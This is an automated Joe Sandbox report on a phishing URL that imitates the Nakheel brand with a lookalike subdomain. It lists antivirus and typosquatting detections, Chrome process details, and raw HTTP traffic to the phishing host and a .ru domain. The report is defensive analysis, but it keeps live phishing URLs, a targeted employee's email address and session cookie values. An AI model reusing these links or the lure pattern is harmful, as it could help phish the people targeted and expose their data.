Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=

Overview

General Information

Sample URL:http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=
Analysis ID:1562504
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious URL

Classification

  • System is w10x64
  • chrome.exe (PID: 5216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2272,i,518914970314299408,18083616340213394987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://qqc.ardsmandons.com/4R2xjWr/Avira URL Cloud: Label: phishing
Source: https://qqc.ardsmandons.com/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com
Source: https://qqc.ardsmandons.com/4R2xjWr/#Bsabika.abid@nakheel.comHTTP Parser: No favicon
Source: https://qqc.ardsmandons.com/4R2xjWr/#Bsabika.abid@nakheel.comHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.52.182.8
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /4R2xjWr/ HTTP/1.1Host: qqc.ardsmandons.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://qqc.ardsmandons.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://qqc.ardsmandons.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://qqc.ardsmandons.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://qqc.ardsmandons.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://qqc.ardsmandons.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e82bfcf1ab94363&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1YtuxKSP5EdRDh+&MD=YkXyWXgC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e82bfcf1ab94363&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: qqc.ardsmandons.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qqc.ardsmandons.com/4R2xjWr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijdhd3hUZFNLcmQxYUpHVnlQQjRENkE9PSIsInZhbHVlIjoiaW1BdG5Kd1VoNjRXZTVtRkEvQ3JmZE9TYk5KdlZ1dWErWG4xOVpFc2FJeXhtMk42MXR3STh4TzJzbENBdTZQcWxZaWY1a2wxQ3FEVXN2T1V2WXBmZWR2QXI2a1A1aFpFRFlvS1pocnduL2MrS0w1ME1LSTgya0lNNEtoK3NDcUEiLCJtYWMiOiI2ZDg0NDE2ZjM1OGVlY2JkNDU2N2M4YzIwNTE1MjYwNzg3ZTkxZmZmYWU0ZTQ5MWY4YTMxNjBmODliOGJhYTlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlwY1J6RmxKMm1vdGlaQWNMeFRuWkE9PSIsInZhbHVlIjoicHU3cjlsRzJYeVlHcE5CSGY0QjF2UG90UnJNMjJhZW1ZbnV2NHFnSW5LdjBlaTlGdElLM0RuWFoxZXJENnM3OUozN1h3bktNUTErNmx3SStPa3NIOEZMamdkbGJ0NnJ1RjJJT3J2ZkpGWmkyTkRpbGRhK3Faa2hIYWsxMXQ0YWciLCJtYWMiOiIyMjdmMzgxYWU1ZjMzOWY1YTgzYzFiMmJkZDdlN2M2YmFkYzc1YmQ0ZTMwYjMxNzVhODBiNDRmYjExMGU0OGZlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8e82bfcf1ab94363/1732549357172/tddkygsc6Gt9a0U HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8e82bfcf1ab94363/1732549357172/tddkygsc6Gt9a0U HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8e82bfcf1ab94363/1732549357173/ccce095667aa92a7495f36d6268a9260aff23fd8f55ad65a788d14cc1ea784da/ODAl4Am2Zd02-Om HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /988387090550690360942vzLvHtGVHERARQUWXWDBFMNZLRVRYOYAYHSOXNLMIK HTTP/1.1Host: 98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://qqc.ardsmandons.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qqc.ardsmandons.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /988387090550690360942vzLvHtGVHERARQUWXWDBFMNZLRVRYOYAYHSOXNLMIK HTTP/1.1Host: 98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1YtuxKSP5EdRDh+&MD=YkXyWXgC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
